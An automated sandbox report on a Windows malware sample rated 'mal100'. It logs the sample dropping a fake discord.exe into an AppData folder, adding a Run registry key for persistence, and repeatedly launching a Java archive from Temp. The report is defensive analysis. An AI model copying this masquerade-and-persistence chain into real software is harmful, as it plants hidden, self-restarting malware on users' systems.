Source: unknownProcess created: C:\Users\user\Desktop\S3zoj9Uts0.exe C:\Users\user\Desktop\S3zoj9Uts0.exe
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeProcess created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe "C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe" -jar "C:\Users\user\AppData\Local\Temp\jarva.jar"
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
Source: C:\Windows\SysWOW64\icacls.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exe "C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe "C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe" -jar "C:\Users\user\AppData\Local\Temp\jarva.jar"
Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exe "C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe "C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe" -jar "C:\Users\user\AppData\Local\Temp\jarva.jar"
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeProcess created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe "C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe" -jar "C:\Users\user\AppData\Local\Temp\jarva.jar" Jump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)MJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe "C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe" -jar "C:\Users\user\AppData\Local\Temp\jarva.jar" Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe "C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe" -jar "C:\Users\user\AppData\Local\Temp\jarva.jar"
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeFile created: C:\Users\user\AppData\Local\Temp\jarva.jarJump to behavior
Source: classification engineClassification label: mal100.winEXE@12/3@3/4
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeFile read: C:\Users\desktop.iniJump to behavior
Source: S3zoj9Uts0.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4904:120:WilError_01
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeSection loaded: C:\Program Files (x86)\Java\jre1.8.0_211\bin\client\jvm.dllJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeFile opened: C:\Windows\SysWOW64\en-US\MsftEdit.DLL.muiJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
Source: S3zoj9Uts0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: S3zoj9Uts0.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: S3zoj9Uts0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Users\akate\source\repos\MAHAServer\MAHA\obj\Debug\discord.pdb source: S3zoj9Uts0.exe, 00000000.00000000.309170814.00000000001D2000.00000002.00000001.01000000.00000003.sdmp, S3zoj9Uts0.exe, 00000000.00000002.577854090.00000000024B1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\akate\source\repos\MAHAServer\MAHA\obj\Debug\discord.pdbR source: S3zoj9Uts0.exe, 00000000.00000000.309170814.00000000001D2000.00000002.00000001.01000000.00000003.sdmp, S3zoj9Uts0.exe, 00000000.00000002.577854090.00000000024B1000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeCode function: 1_3_15E0A0E2 push ebp; retf 1_3_15E0A0E3
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeCode function: 1_3_15E0B11F push ds; ret 1_3_15E0B13E
Source: S3zoj9Uts0.exeStatic PE information: 0xD901697B [Tue May 15 07:00:11 2085 UTC]

Persistence and Installation Behavior

barindex
Drops executable to a common third party application directory
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeFile written: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeFile written: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeJump to dropped file
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run DiscordJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run DiscordJump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exe TID: 5824Thread sleep count: 708 > 30Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exe TID: 3544Thread sleep count: 657 > 30
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeWindow / User API: threadDelayed 759Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeWindow / User API: threadDelayed 708Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeWindow / User API: threadDelayed 657
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeFile opened: C:\Users\userJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
Source: javaw.exe, 00000005.00000003.350864444.0000000014CFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: com/sun/corba/se/impl/util/SUNVMCID.classPK
Source: javaw.exe, 00000005.00000003.350864444.0000000014CFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &com/sun/corba/se/impl/util/SUNVMCID.classPK
Source: javaw.exe, 00000001.00000002.576386028.00000000029E0000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.576479340.0000000002610000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ,java/lang/VirtualMachineError
Source: javaw.exe, 00000001.00000002.576386028.00000000029E0000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.576479340.0000000002610000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |[Ljava/lang/VirtualMachineError;
Source: javaw.exe, 00000005.00000003.350864444.0000000014CFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: org/omg/CORBA/OMGVMCID.classPK
Source: javaw.exe, 00000001.00000003.317467438.00000000150CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: java/lang/VirtualMachineError.classPK
Source: S3zoj9Uts0.exe, 00000000.00000002.575985804.00000000007AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeMemory allocated: page read and write | page guardJump to behavior
Source: C:\Users\user\Desktop\S3zoj9Uts0.exeProcess created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe "C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe" -jar "C:\Users\user\AppData\Local\Temp\jarva.jar" Jump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)MJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe "C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe" -jar "C:\Users\user\AppData\Local\Temp\jarva.jar" Jump to behavior
